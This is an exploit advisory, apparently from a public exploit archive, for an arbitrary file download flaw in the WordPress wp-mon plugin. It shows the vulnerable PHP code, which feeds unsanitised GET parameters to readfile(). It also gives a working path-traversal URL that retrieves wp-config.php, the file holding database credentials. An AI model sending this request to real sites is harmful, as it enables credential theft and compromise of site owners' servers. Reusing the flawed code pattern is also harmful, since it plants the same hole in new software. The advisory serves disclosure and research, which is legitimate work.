|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|
  |-------------------------------------------------------------------------|
  | [+] Exploit Title:Wordpress wp-mon Plugin Arbitrary File Download  
Vulnerability |
  | [+] Exploit Author: Ashiyane Digital Security Team |
  | [+] Vendor Homepage : https://wordpress.org/plugins/wp-mon/
  | [+] Download Link : https://downloads.wordpress.org/plugin/wp-mon.zip
  | [+] Tested on : Windows,Linux |
  | [+] Date : 2015-04-16
  | [+] Discovered By : ACC3SS
  |-------------------------------------------------------------------------|
  | [+] Exploit: |
  | [+] Vulnerable file :  
http://localhost/wordpress/wp-content/plugins/wp-mon/assets/download.php  
|
  | [+] Vulnerable Code :

<?php

	header( 'Content-Type: ' . $_GET['type'] );
	header( 'Content-Disposition: attachment; filename="' . $_GET['name']  
. '"' );
	readfile( $_GET['path'] . DIRECTORY_SEPARATOR . $_GET['name'] );

?>

  | [+]   
http://localhost/wordpress/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=[File Address]&name=[File  
Name]
  | [+]
  | [+] Examples :  
http://localhost/wordpress/wp-content/plugins/wp-mon/assets/download.php?type=octet/stream&path=../../../../&name=wp-config.php
  |-------------------------------------------------------------------------|
|*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*||*|